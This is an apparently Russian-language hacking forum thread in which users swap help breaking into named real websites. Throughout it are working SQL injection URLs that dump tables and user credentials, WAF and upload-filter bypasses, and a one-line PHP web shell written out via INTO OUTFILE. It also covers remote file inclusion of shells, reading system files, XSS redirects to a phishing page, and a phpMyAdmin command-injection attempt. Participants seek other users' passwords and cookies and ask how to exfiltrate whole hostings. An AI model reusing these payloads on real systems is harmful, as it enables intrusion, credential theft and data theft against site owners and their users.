ne polucaetsya..

ne polucaetsya..
ты прикалываешься?

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4, 5,6,7,8,9,10+FROM+information_schema.tables+where+ table_name%3E0x75736572+--+

А что ты вообще сделать хочешь?

я ету знаю..мне нуэн вот здес написат полное имя..

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75736572+--+

в конце написат полное имя таблици..и в какоы кодировке как написать ??

я ету знаю..мне нуэн вот здес написат полное имя..

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75736572+--+

в конце написат полное имя таблици..и в какоы кодировке как написать ??


http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 %20,5,6,7,8,9,10+FROM+information_schema.columns+W HERE+table_name=0x7573657273+--+


Открываешь исходный код, ищешь к примеру password и там все колонки, а вообще просто дописываешь and+column_name>hex твоей последней полученной колонки. Не глупи, и сам экспериментируй

Ребята, я вроде как не полный новичок, просто никогда не работал с шелами. Но надо же когда-то начинать :)
Вопрос больше по теоретической части, по поводу запуска шела через php-include.
Вот есть у меня на сайте шел http://mysite.com/shell.php, и есть инклуд (глобальный) http://site.com/index.php?dir=asdsad.
Делаем так: http://site.com/index.php?dir=http://mysite.com./shell.php%00 (только не надо говорить, что такие ситуации сейчас встречаются редко и т.д. просто представим такую ситуацию, что все работает).
Ну и собственно у меня появляется на мониторе мой шел. А теперь объясните мне, какой от него толк?! Ведь шел залит-то на моём сайте, и отображает директории все и информацию именно о моём сайте :confused: Просто отобразился мой шел с моего сайта на сайте site.com как бы в отдельном фрейме.
Может быть у меня какое-то размытое понятие о шелах, об их разновидностях и использовании. Сам юзаю c99madshell.
Увы, детальную инфу о шелах на форуме не нашел. Если я где-то что-то провтыкал, прошу указать, где можно об этом почитать. Заранее благодарен :)

Если там всеже ремоут инклюд,а не фрейм, тогда переименуй свой шелл в
http://mysite.com/shell.txt

и пробуй так

Проблема в том что у тя сайт поддерживает пхп а надо шелл держать либо на хосте без пхп, или изменить расширение....

Да, точно, http://mysite.com/shell.txt заработало :)
Хм, теперь стало чуть понятней принцип. Спасибо.
А может кто-то дать ссылку на хорошую инфу по шелам? И каким лучше всего шелом пользоваться?

редкий шелл - но крутой dxshell.

лит-ры в основном нету, шелл это файловый менеджер.+ выполнение смд


Постучись ко мне - скажи что не понимаешь объясню

Sams, либо просто запихай шелл в папку с .htaccess в котором укажи что бы .php исполнялось как text.

как можно обойти фильтрацию загружаемого файла в админке ?!
по сути можно загружать "все файлы", но при заливке пхп-скрипта вылезает ошибка...что можно в таких случаях сделать ?

Ошибка какая? попрбуй .htaccess залить
AddType application/x-httpd-php .php .htm .html .jpg .gif

потом выбирай то что заливается =)

Такая проблема:
Нашел скулю заливаю через нее шелл
INTO OUTFILE 'D:\htdocs\www.site.ru\shel.php'
из внешки его не вижу, а по LOAD_FILE нормально видит.
По LOAD_FILE невидно ни одного файла кроме тех что сам залил.

В ошибках путь вылазит:
D:\htdocs\www.site.ru\index.php
D:\htdocs\www.site.ru\admin\conf.php

Как найти реальное расположение сайта или что ето за прикол такой)?

По LOAD_FILE невидно ни одного файла кроме тех что сам залил.

Ну наверное тогда путь не тот
База на другом серваке
Чмоды

concat_ws(0x3a,user,host)+from+mysql.user
посмотри как прописан твой user()

concat_ws(0x3a,user,host)+from+mysql.user
посмотри как прописан твой user()

concat_ws(0x3a,user,host)
L2Emu:127.0.0.1

concat_ws(0x3a,user,host,file_priv)
root:localhost:Y

2FAQ666
что-то мне подсказывает, что проблема возникла из-за слешей, попробуй
INTO OUTFILE 'D:/htdocs/www.site.ru/shel.php'

2FAQ666
что-то мне подсказывает, что проблема возникла из-за слешей, попробуй
Ой спасибочки)))))) так и есть!

А можно ли в инъекции определить тип поля и длину(если Text)?

Пока ходил курить, нашёл ответ, если кого заинтересовало и кто не знает:
GROUP_CONCAT(column_name,0x3a,column_type) from information_schema.columns where table_name='tablename'

Взломщику такая инфа непредоставляеться.
Если иньекция в сценарии администрирований баз данный через веб, а там чето mysql_field_flags...!
ИМХО

http://www.dsthosting.com/billing/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,GROUP_CONCAT(column_n ame,0x3a,column_type,0x3a,CHARACTER_MAXIMUM_LENGTH ),9,10,11,12,13,GROUP_CONCAT(column_name,0x3a,colu mn_type),15,16+from+information_schema.columns--


Мне предоставляется!) ИМХО!)

дадада давай на <4 ветки)
Не ну понятно, что я это для пятой. 4ая и о колонках особо инфой в скулях не блещет)

Для оперы не знаю, а для Мозиллы есть плагин Tamper Data.

Помогите определить движек http://www.peterjob.ru/
http://www.peterjob.ru/vakancy_search/2/?job_category=5-5%20union%20select%201--

Помогите определить движек http://www.peterjob.ru/
http://www.peterjob.ru/vakancy_search/2/?job_category=5-5%20union%20select%201--


самопис

delete

там 4-ая ветка, name_const не поможет

права 777, но файл не writable - почему так?

linux SuSE + apache2 + php 4.3.3

Помогите вывести версию Плиз

http://www.nzgeographic.co.nz/articles.php?ID=75+union+select+1,2,3,4,5,6,7--

http://www.nzgeographic.co.nz/articles.php?ID=(select+1+from+(select+count(0),co ncat((select+version()),floor(rand(0)*2))+from+inf ormation_schema.tables+group+by+2+limit+1)a)--+

Чем полезен модуль mod_userdir [написал туда] ???
http://wiki.linuxformat.ru/index.php/LXF90:Apache, для хека даст развечто логины пользователей для последующего брутфорса.

При MSSQL inj WAF удаляет select,какой есть аналог или как обойти?Спасибо

При MSSQL inj WAF удаляет select,какой есть аналог или как обойти?Спасибо

/*!select*/

or+1=(/*!select*/+table_name+from+information_schema.tables)--
ругается Line 1: Incorrect syntax near '/'.

Если там банальный str_replace, попробуй с регистром поиграть, т.е (к примеру)
sElEcT
А если же str_ireplace, тогда так:
seselectlect

Но не факт что сработает, т.к. все вышесказанное основано лишь на догадках.

Подскажите как мне узнать пароль от сайта в опере, если "жертва" не запоминает пароль и ставит галочку чужой компьютер?

Не могу до конца раскрутить скул:

http://www.sixls.com/news.php?id=-3+union+select+1,concat_ws(0x0b, version(), database(), user()),3--

Версия: 5.0.88-community-log
Юзер: sixls_com_-_1
База: sixls@ww1.4what.net

Идут таблицы:

http://www.sixls.com/news.php?id=-3+union+select+1,table_name,3+from+information_sch ema.tables--

Дальше поля:

http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_sc hema.columns--

-----------------------------------------
Я искал на форуме и ни как не мог найти инфу о том как выводить поля, которые находятся в определенной таблице, и как из полей выводить нужные данные, например пароль и и мя пользователя. Заранее спасибо =)

Не могу до конца раскрутить скул:

http://www.sixls.com/news.php?id=-3+union+select+1,concat_ws(0x0b, version(), database(), user()),3--

Версия: 5.0.88-community-log
Юзер: sixls_com_-_1
База: sixls@ww1.4what.net

Идут таблицы:

http://www.sixls.com/news.php?id=-3+union+select+1,table_name,3+from+information_sch ema.tables--

Дальше поля:

http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_sc hema.columns--

-----------------------------------------
Я искал на форуме и ни как не мог найти инфу о том как выводить поля, которые находятся в определенной таблице, и как из полей выводить нужные данные, например пароль и и мя пользователя. Заранее спасибо =)

Для начала...
http://forum.antichat.ru/thread104591.html

как обойти такую конструкцию?)

$uploaddir = "../photos/";
$fext = ".gif";
move_uploaded_file($_FILES[$key]['tmp_name'], $uploaddir . $row['ID'] . "." . $key . $fext)

на $row['ID'] могу влиять)
сделал $row['ID'] = "1.php%00" получил:
Warning: move_uploaded_file(../photos/1.php%00.photo1.jpg) [function.move-uploaded-file]: failed to open stream: Permission denied in /usr/www/users/manager/updateProfile.php on line 814
создать фаил прав не хватает или что то другое?

Да, не хватает. А обычные гифки тоже не грузятся?

http://ukr-link.com/index.php?idd=catalog&group=142'
мож кто попробует вывести или еще что ?

начал ломать свой первый сайт) обнаружил пути, даже файл с подключением к БД (конфиги) а что дальше?(

начал ломать свой первый сайт) обнаружил пути, даже файл с подключением к БД (конфиги) а что дальше?(
подключится к БД и сдампить/вытащить пароли и попробовать к админке сайта или через mysql залить шелл и юзать полноценный шелл ....
P.S Зачем ломал то если не знаеш что делать дальше ? ))

мож кто попробует вывести или еще что ?
http://ukr-link.com/index.php?idd=search&stext=auto')union(select'1',2,table_name,(4)from(i nformation_schema.tables))%23

как обойти такую конструкцию?)

на $row['ID'] могу влиять)
сделал $row['ID'] = "1.php%00" получил:
Warning: move_uploaded_file(../photos/1.php%00.photo1.jpg) [function.move-uploaded-file]: failed to open stream: Permission denied in /usr/www/users/manager/updateProfile.php on line 814
создать фаил прав не хватает или что то другое?
Насколько я понял, ты $row['id'] устанавливаешь методом POST, где данные передаются "как есть", т.е. не url-encoded символы не превращаются в обычные. Попробуй обратится GET'ом, или COOKIE. Если запрос в БД идет через глобальный массив _REQUEST, то должно сработать.

$row['id'] берется из базы.
пробовал обычную картинку - тот же еррор.
видимо файлы новые создать нельзя. а существующие он заменяет(

Strilo4ka, нулл-байт ты не скопируешь в буфер никак!

http://www.linumechilinum.am/?include=static2&page_id=49+union+select+0

ne kak ne polucaetsya..

v1d0qz, спасибо за ссылку, но мне это не помогло =(

Вот я делаю запрос:

http://www.sixls.com/news.php?id=-3+union+select+1,table_name,3+from+information_sch ema.columns+where+table_name=%27private_users%27--

У меня кроме ошибок снизу (а они всегда были) ничего не выводится, хотя должно выводиться. Или я чтото не правильно делаю?

http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_sc hema.columns+where+table_name=0x707269766174655f75 73657273

Хексим название таблицы и берем названия КОЛОНОК из таблицы с колонками, а не таблиц, ты их уже получил

wildshaman, спасбо, теперь я понял, но вот еще один последний вопрос. Когда я даю запрос, которые есть выше, то на экран выводит user_username и user_password. Как дальше из этих колонок вывести их значения (на данный момент пасс и логин)?

http://www.sixls.com/news.php?id=-3+union+select+1,count(*),3+from+private_users--+
0

Jokester, вывело только 0 и больше ничего =(

Jokester, вывело только 0 и больше ничего =(
Серьёзно? Тебе-же давали линк:
https://forum.antichat.ru/thread104591.html
И ты сказал, что прочёл материал.
Я там видимо по японски писал, соре :(

Прочитал пару раз вашу тему и вот что у меня получилось:

http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_sc hema.columns+where+column_name=0x70616765730d0a--

Выбрал таблицу pages и там одну из колонок, вотвывожу и ничего нет.

Прочитал пару раз вашу тему и вот что у меня получилось:

http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_sc hema.columns+where+column_name=0x70616765730d0a--

Выбрал таблицу pages и там одну из колонок, вотвывожу и ничего нет.
http://www.sixls.com/news.php?id=-3+union+select+1,2,count(column_name)+from+informa tion_schema.columns+where+table_name=0x70616765730 d0a+--+

Нету там колонок, и после where не column_name, а table_name

Вот такой вопросик:
попалась стандартная уязвимость на asp:
http://www.site1.com/detail.asp?sid=1485+or+1=@@version--
нормально выводится версия операционки, дальше пытаюсь вытащить названия столбцов из information_schema вот так:
http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables)--
показывает, что есть таблица 'Photos', дальше через not in:
http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables where table_name not in ('Photos'))--
вылетает ошибка " Line 1: Incorrect syntax near 'Photos' "
пробую так:
http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables where table_name not in ("Photos"))--
вылетает: " Invalid column name 'Photos'. "
затестил через <>, заменив название таблицы через хекс так:
http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables where table_name<>0x50686f746f73)--
сработало, но больше одного названия вытащить не получается.
Вопрос: как можно полистать названия?

Прочитал пару раз вашу тему и вот что у меня получилось:
вот вывод из той самой таблицы, что там могло не получаться?
http://www.sixls.com/news.php?id=-3+union+select+1,page_id,3+from+pages--
Jokester хочу твой ответ.
Я бы с удовольствием ответил, но боюсь, что то, что ты пишешь понимаешь только ты сам :(
Ну или я туповат, я честно пытался понять, но безуспешно.

mr.celt
С линком будет проще

С линком будет проще

отправил в личку

Strilo4ka, не обижайся, но без разделительных знаков понять то, что ты пишешь, трудновато.

Ты не так меня понял. Запрос на сервер можно послать как угодно, другое дело - сделать это через браузер. В браузере через формы с методом POST данные передаются "как есть", тоесть без какого-либо декодирования.

есть строчка такого рода:

wordpress_test_cookie=WP+Cookie+check;%20wordpress user_4660020b7a87d7619827cd8098d2d654=Spider;%20wo rdpresspass_4660020b7a87d7619827cd8098d2d654=febc2 2cb6c4923d9271a857fc9ea2f7d


как отсюда выдернуть кукисы или мд5 хеш пароля?мб онлайн дешифратор какой-то?

http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,group_concat%28column_name% 29,3%20from%20information_schema.columns%20where%2 0table_name=0x75736572--
выдает id,name,email,pass,session_id,session_date,nick

Нашел Sql
Но при этом когда пишу http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,2,3%20from%20user-- Выдет пустую страницу

В чем может быть косяк?

http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,group_concat%28column_name% 29,3%20from%20information_schema.columns%20where%2 0table_name=0x75736572--
выдает id,name,email,pass,session_id,session_date,nick

Нашел Sql
Но при этом когда пишу http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,2,3%20from%20user-- Выдет пустую страницу

В чем может быть косяк?


http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,count(*),3+from+user

Таблица пустая

Всем привет
можно ли это как нибудь обойти?

$kat = htmlspecialchars($kat);
$kat = str_replace('.','',$kat);
$kat = str_replace('/','',$kat);

if ($_GET[file])
{
file("$kat/$file1");
}

:D

http://www.mission.am/am/past/program.php?ID=-1+union+select+1,fi le_priv,3,4 ,5,6,7,8,9,10,11,12 +from+mysql.user

pojalusta pmoqite kak mojno zalivat shell ??

http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('c:/boot.ini'),3,4,5,6,7,8,9,10,11,12+from+mysql.user


искать абсолютные пути, брутить

Pashkela , izvini a kak i qde brutit ??

kak moqu uznat drugie puti ??

просто брутить, известными программами или своим скриптом *тулза умеет, только для винды там словарь говеный*

просто брутить, известными программами или своим скриптом *тулза умеет, только для винды там словарь говеный*
Паша, тебе лишь-бы логи засрать своей чудо программой.
Ну сколько-же тебя просить не учить людей всякой херне =\

LokbatanLi
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12+from+mysql.use r
ServerName mission.am
DocumentRoot htdocs/mission
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/htdocs/mission/index.php'),3,4,5,6,7,8,9,10,11,12+from+mysql.user

PS Если там "случайно" окажется дефейс от турецких хакеров, ты тут больше советов не проси пожалуйста

есть строчка такого рода:

wordpress_test_cookie=WP+Cookie+check;%20wordpress user_4660020b7a87d7619827cd8098d2d654=Spider;%20wo rdpresspass_4660020b7a87d7619827cd8098d2d654=febc2 2cb6c4923d9271a857fc9ea2f7d


как отсюда выдернуть кукисы или мд5 хеш пароля?мб онлайн дешифратор какой-то?
судя по всему куки от wp <2.5, там пароль хранится в wordpresspass алгоритмом md5(md5())

У меня имееться xss. Я сделал чтобы была автоматическая переадресация на мой фейк таким образом:
style=background:url('//') onerror=document.write
Но это работает только в опере

Для ie & firefox я сделал чтобы при наведении на текст переадресовывало на фейк:
onmouseover=document.write

Как сделать чтоб переадресация была автоматически в ie & firefox?

Паша, тебе лишь-бы логи засрать своей чудо программой.
Ну сколько-же тебя просить не учить людей всякой херне =\

LokbatanLi
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12+from+mysql.use r

http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/htdocs/mission/index.php'),3,4,5,6,7,8,9,10,11,12+from+mysql.user

PS Если там "случайно" окажется дефейс от турецких хакеров, ты тут больше советов не проси пожалуйста
net ne za defeysom sprasu..

prosto ne moqu nayti path shtobi shell zalivat ??

a dalse kto pomojet ??

net ne za defeysom sprasu..

prosto ne moqu nayti path shtobi shell zalivat ??

a dalse kto pomojet ??


Тебе ж дали путь.

На всякий случай почитай http://forum.antichat.ru/thread104591.html

Помогтье загрузить шелл!Грузятся только изображния!остальное просто режется.
файл типа shell.php режется к виду [какое либо число] без расширения
т.е. shell.php будет подимене 8 без расширения
shell.php.php
shell.php%00.jpg
.htaccess не катят

shell.php3
shell.phtml
shell.php3.php
shell.phtml.php
shell.pHp
shell.PHTmL

wildshaman спс за ответ! какойто из способов помог!! оказалось зря шелл грузил и парился ((( очень суровые там условия!

если я в каком либо чате нашёл XSS которая реагирует когда выполняется код (ппросмотр чата)
то могу ли я туда сниффер поставить ?

если я в каком либо чате нашёл XSS которая реагирует когда выполняется код (ппросмотр чата)
то могу ли я туда сниффер поставить ?
Да. Это называется активная XSS.

есть пароль и логин о мускуля сайта. можно ли подключиться к нему? какой клиент посоветуете?
phpmyadmin на сайте нет, через веб-интерфейс никак...

есть пароль и логин о мускуля сайта. можно ли подключиться к нему? какой клиент посоветуете?
phpmyadmin на сайте нет, через веб-интерфейс никак...

Всё зависит от пользователя MySQL. Если имя <имя>@localhost, то это значит, что удаленно подключится никак нельзя, лишь с локальной машины (если не ошибаюсь, то root@localhost - исключение. К нему можно подключаться удаленно). В таком случае можно только через шелл на сайте.

Есть много хороших статей. Гугли "удаленное подключение MySQL". Самая первая неплохая.

Кто знает как вывести int значение в mssql инже. Т.е. есть табличка которую нужно проверить на записать (т.е. update). Но так как там все значения int, не получается проверить даже по условию.
Пробывал cast(x+as+int), convert(int,x), и ещё кучу всего. Значения там точно есть. Вообщем у кого есть опыт по сабжу, прошу поделится.

ну если надо вывести int через провоцирование ошибки, то тогда наоборот пробовать convert(text,(запрос)) или convert(char,(запрос))

Кто знает как вывести int значение в mssql инже. Т.е. есть табличка которую нужно проверить на записать (т.е. update). Но так как там все значения int, не получается проверить даже по условию.
Пробывал кучу всего. Значения там точно есть, потому что я могу их использовать в условии и они работают. Вообщем у кого есть опыт по сабжу, прошу поделится.

зы. Так как написал, Паша, не работает.

зы2. Есть, я сделал это.. Через преобразования данных в xml. Т.е. (в конце просто дописуем - FOR XML RAW)

После такого запроса>
id=4+or(1,1)=(select+count(0),concat((select+versi on()+from+information_schema.tables+limit+0,1),flo or(rand(0)*2))from(information_schema.tables)group +by+2)
выходит:
Operand should contain 1 column(s)

в чем трабла? :(

Вообщем есть уязвимый скуль, доступен load_file() прочитал httpd.conf виртуал хост не прописан. есть ток Include /etc/apache2/sites-enabled/ пробовал прочитать /etc/apache2/sites-enabled/default пусто... попробовал /etc/apache2/sites-enabled/000-default
выдает след
единственная полезная запись
DocumentRoot /srv/http/
пробую подставлять папки и файлы куча не соответствий... вообщем не то.. и похожей директории не получается отыскать... может есть еще варианты узнать реальный путь

']После такого запроса>

выходит:
Operand should contain 1 column(s)

в чем трабла? :(

вот это:


id=4+or(1,1)=(select+count(0),concat((select+versi on()+from+information_schema.tables+limit+0,1),flo or(rand(0)*2))from(information_schema.tables)group +by+2)


замени на это:


id=(select+1+from+(select+count(0),concat((select+ version()+from+information_schema.tables+limit+1), floor(rand(0)*2))+from+information_schema.tables+g roup+by+2+limit+1)a)

Pashkela Cпасиба!)
все идет..

Вообщем есть уязвимый скуль, доступен load_file() прочитал httpd.conf виртуал хост не прописан. есть ток Include /etc/apache2/sites-enabled/ пробовал прочитать /etc/apache2/sites-enabled/default пусто... попробовал /etc/apache2/sites-enabled/000-default
выдает след
единственная полезная запись
DocumentRoot /srv/http/
пробую подставлять папки и файлы куча не соответствий... вообщем не то.. и похожей директории не получается отыскать... может есть еще варианты узнать реальный путь


/etc/apache2/sites-enabled/domen.com

где domen.com - сайт, где у тя скуля.

Так пробовал?

Есть шелл, могу просматривать весь хостинг, по одному файлу много не выкачаю =).
платформа Linux.
Можно ли создать фтп пользователя через консоль? если да то как ето сделать?
Есть ли другие варианты всее от туда стянуть? Bind port to и архивация не подходят!

Есть шелл, могу просматривать весь хостинг, по одному файлу много не выкачаю =).
платформа Linux.
Можно ли создать фтп пользователя через консоль? если да то как ето сделать?
Есть ли другие варианты всее от туда стянуть? Bind port to и архивация не подходят!
Зачем тебе FTP? Архивируй через tar и скачивай через шелл.

Зачем тебе FTP? Архивируй через tar и скачивай через шелл.
Архивация не подходит! если больше двух метров архив то ошибка! да и свободного места там практические нет.

Вобще прощу помощи есть база данных от сайта, типа db_user, db_pass, db_host ну и т.д., Движок ДЛЕ, но шелла нет ( Подскажите можно ли как то взломать?

что взломать?

Подскажите плиз, точнее напишите мне пожалуйста самый примитивный скрипт с blind sql-inj. Я чёто начал писать, но ошибка выводиться токо при подстановки ковычек. помогит плиз
<?php
...
if(isset($_GET['type']))
{
$response=mysql_query("SELECT * FROM news WHERE type='".$_GET['type']."'");
$result=mysql_fetch_array($response);
}
...
?>

Подскажите плиз, точнее напишите мне пожалуйста самый примитивный скрипт с blind sql-inj. Я чёто начал писать, но ошибка выводиться токо при подстановки ковычек. помогит плиз
<?php
...
if(isset($_GET['type']))
{
$response=mysql_query("SELECT * FROM news WHERE type='".$_GET['type']."'");
$result=mysql_fetch_array($response);
}
...
?>

<?php
...
if(isset($_GET['type']))
{
$response=mysql_query("SELECT count(*) FROM news WHERE type='".$_GET['type']."'");
$result=mysql_fetch_array($response);
}
...
?>

Люди, подскажите, есть доступ к mysql , рутовский как бы.

но не знаю как залить шелл на сайт, посоветовали через запрос
select '<?php eval(system($_GET[v]));?>' from mysql.user into outfile 'директория\фаил.пхп';

но не могу найти папку с правами на залив.

что делать?

Люди, подскажите, есть доступ к mysql , рутовский как бы.

но не знаю как залить шелл на сайт, посоветовали через запрос
select '<?php eval(system($_GET[v]));?>' from mysql.user into outfile 'директория\фаил.пхп';

но не могу найти папку с правами на залив.

что делать?


http://tinyurl.com/yb2gm96

Почему не логиниться???

http://www.sflcn.com/admin

выдрал логин пасс

http://www.sflcn.com/story.php?id=-8069+union+select+1,2,group_concat%28username,0x3a ,userpassword%29,4,5,6,7,8+from+users

Попробуйте плиз. может у меня руки кривые

2 scorpic393
во-первых, не всегда данные из таблицы подойдут к админке( мб просто данные для входа в нее в другой таблице ) , во-вторых, в данном случае на админку стоит бейсик-авторизация, что в 90% случаев, означает, что пассворд хранится не в бд, а в файле .htpasswd
такие дела

на админку стоит бейсик-авторизация, что в 90% случаев, означает, что пассворд хранится не в бд, а в файле .htpasswd
такие дела
90%?)) имхо ты ошибаешся

Вот таким образом выводится нужные мне значения но по одному, меняя лимит

UNION SELECT * FROM(SELECT * FROM (SELECT NAME_CONST((SELECT password FROM user LIMIT 1), 14)d) as t JOIN(SELECT NAME_CONST((SELECT password FROM user LIMIT 1),14)e)b)a


Каким образом можно вывести весь список сразу? intooutfile доступ запрещён для этого юзверя.

Нашел сайт с mssql injection. Перебираю таблицы, но с кодировкой что-то не то. Вроде стоит cp1252
.

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'Çàïðîñ_Ñòàäèè_Êëèåíò' to a column of data type int.


Подставляю это значение в запрос

1 or 1=(select top 1 table_name from information_schema.tables where table_name not in ('rank_table','reklama','Çàïðîñ_Ñòàäèè_Êëèåíò'))

Получаю тоже самое.

Расшифровываю, получаю Запрос_Стадии_Клиент. Пихаю в запрос. Опять та же самая ошибка. Не знаю что делать дальше, помогите, пожалуйста.

Здрасти!
Возникла проблема которую не могу решить даже после прочтения етого треда,множества FAQ по sql inj, sql cheat sheet'ов, мануалов, статей в Хакере и всего подобного.
Вообщем дело обстоит так:
inj:

http://enjoy.md/category.php?id=2%27] http://enjoy.md/category.php?id=2'


Доступ к БД осуществил, вытянуть удалось лишь логины и пассы пользователей сайта, найти логин и пасс админа в этой БД не удалось. В user_privileges - privilege_type-usage и is_grantable-no:

http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,concat_ws%280x3a,grantee,privilege_type ,is_grantable%29+from+information_schema.user_priv ileges--


load_file выдает пустую страницу(что в hex, что в текст, что с aes_decrypt(aes_encrypt)):

http://enjoy.md/category.php?id=-6/**/union/**/select+1,load_file%28%27etc/passwd%27%29,3--+
http://enjoy.md/category.php?id=-6/**/union/**/select+1,load_file%28%27home/vhosts/enjoy.md/public_html/index.php%27%29,3--+


инфа:
version() - 5.1.37 mysql
user()- '20121'@'localhost'
database() - 20121_enjoy
ещё нашел адмику:
http://enjoy.md/admin/
и PMA:
http://enjoy.md/phpmyadmin

что интересно, вовсяком случае мне так показалось, так ето вот:

http://enjoy.md/category.php?id=-2/**/union/**/select/**/1,2,table_schema+from+information_schema.tables+wh ere+table_name=%27admin%27--

Не могу понять откуда эти БД взялись если при таком запросе их не видно:

http://enjoy.md/category.php?id=-2/**/union/**/select/**/1,2,schema_name+from+information_schema.schemata--

Подключитьсяк ним никак не могу,есть ли способ и гдеж логин и пасс админа хранится тогда? в PMA и админке обойти авторизацию не вышло.
Помогите додумать это плз, может совет какой дадите.
На данный момент приходит в голову лишь кража кукисов, на сайте есть мыло и icq, с их помощью узнал ФИО админа,место работы, сделанные им сайты. Не приятно признавать но не охото мне с кукисами морочиться если есть другие варьянты дайте знать :)
SiXSS(alert):

http://enjoy.md/category.php?id=-2/**/union/**/select+1,2,0x3c7363726970743e616c657274282256756c6 e65726162696c69747922293b3c2f7363726970743e%20--

Это может выглядить глупо но всё же:

http://enjoy.md/category.php?id=6+or+1=if%28load_file%28%27/etc/passwd%27%29+is+not+NULL,1,2%29--+

значит всё же file_priv=Y? если я чёт намудрил плз исправьте
доступа к file_priv непсредственно из mysql.users нету,даёт ошибку, как впрочем и к самой БД mysql:
http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,file_priv+from+mysql.users--

еще вопрос, почему пишет privilege_type-select is_grantable-no? Я же вовсю им орудую. Или это отнсится лишь к БД и их выбору?

http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,concat_ws%280x3a,privilege_type,is_gran table%29+from+information_schema.schema_privileges--

надеюсь я ниче не перепутал спс!
кстати: @@datadir - /var/lib/mysql/
а при ошибке даёт другой путь: /home/vhosts/enjoy.md/public_html/category.php
т.к. в моём случае заливка шелла не возможна по всей видимость просто прошу обьяснить какой именно путь указать при load_file

overcrookd в user есть
login:admin
password:666 может это и есть то самое?

п.с ток всеравно логин иле pwd не подходит

']overcrookd в user есть
login:admin
password:666 может это и есть то самое?

п.с ток всеравно логин иле pwd не подходит

естессно я первым делом проверил это, увы, это login и pwd для входа на сайт, не админку.
всеоравно спасибо зв потраченое время :)

где domen.com - сайт, где у тя скуля.

Так пробовал?

Да так тоже пробовал ничего

Нашел сайт с mssql injection. Перебираю таблицы, но с кодировкой что-то не то. Вроде стоит cp1252


Подставляю это значение в запрос



Получаю тоже самое.

Расшифровываю, получаю Запрос_Стадии_Клиент. Пихаю в запрос. Опять та же самая ошибка. Не знаю что делать дальше, помогите, пожалуйста.
1 or 1=(select Val collate Cyrillic_General_CI_AS top 1 table_name from information_schema.tables where table_name not in ('rank_table','reklama'))

мб Val ненужен, и мб перед from поставить, сгуглил просто.

http://www.sql.ru/forum/actualthread.aspx?tid=415606

Благодарю, я видел эту тему.
http://www.rosdiplom.ru/readyi2a1a2new.asp?id=1%20or%201=(select%20top%201 %20table_name%20collate%20Cyrillic_General_CI_AS%2 0from%20information_schema.tables%20where%20table_ name%20not%20in%20('rank_table','reklama'))

Все равно это не решает вопроса с кодировкой, ну и ладно. Видать, встроенными функциями этого не сделать. Пробовал уже и множество чаров, но нет.

Скуль - боян, но интересно, как его раскрутили пару лет назад.

http://www.linumechilinum.am/?include=static2&page_id=49+union+/*!select*/+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52, 53,54,55,56,57,58,59,60

не как не мояу узнать числу..
помоqите//

Есть сайт http://live-cs.ru/, на нем при установке статуса в профиле(http://live-cs.ru/people/Medic/ например) срабатывает введенный код, как это можно использовать, чтобы какой-нибудь другой юзер выполнил действие кода?

2LokbatanLi
c чего ты взял что там скуля?

page_id=49+order+by+1/*
page_id=49'+order+by+1/*
page_id=49+0

нет результата...

вопрос
site?indwx.php?keyword=1'
Message: Can't execute query: You have an error in your SQL syntax; ... '/*%' OR
SELECT COUNT(u.user_id) FROM user AS ... AND (u.name LIKE '%1\'%')

никак не обойти?
заменять ' на %27 пробовал

Помогите найти админку http://www.f1-world.ru

http://www.tomydate.com/search_results.php?keyword=1'
помогите)

плз подскажыте по посту #11976 я пока только учусь и эта "задачка" ну просто рвет мне мозг, не давая покоя.

phpmyadmin

при запросе..

site.com/phpmyadmin/server_databases.php?pos=0&dbstats=0&sort_by="]); OR exec('cp $(pwd)"/config.inc.php" config.txt'); &sort_order=desc&token=....

На сколько я понял в документации стоит специальная ошибка (или не стоит :) ).. но исправив её всё-равно не работает. Тестирую на версии 2.11.8.1

Выбивает ошибку.

Помилка

SQL-запит: Документація

SELECT `information_schema`.`SCHEMATA` . *
FROM `information_schema`.`SCHEMATA`
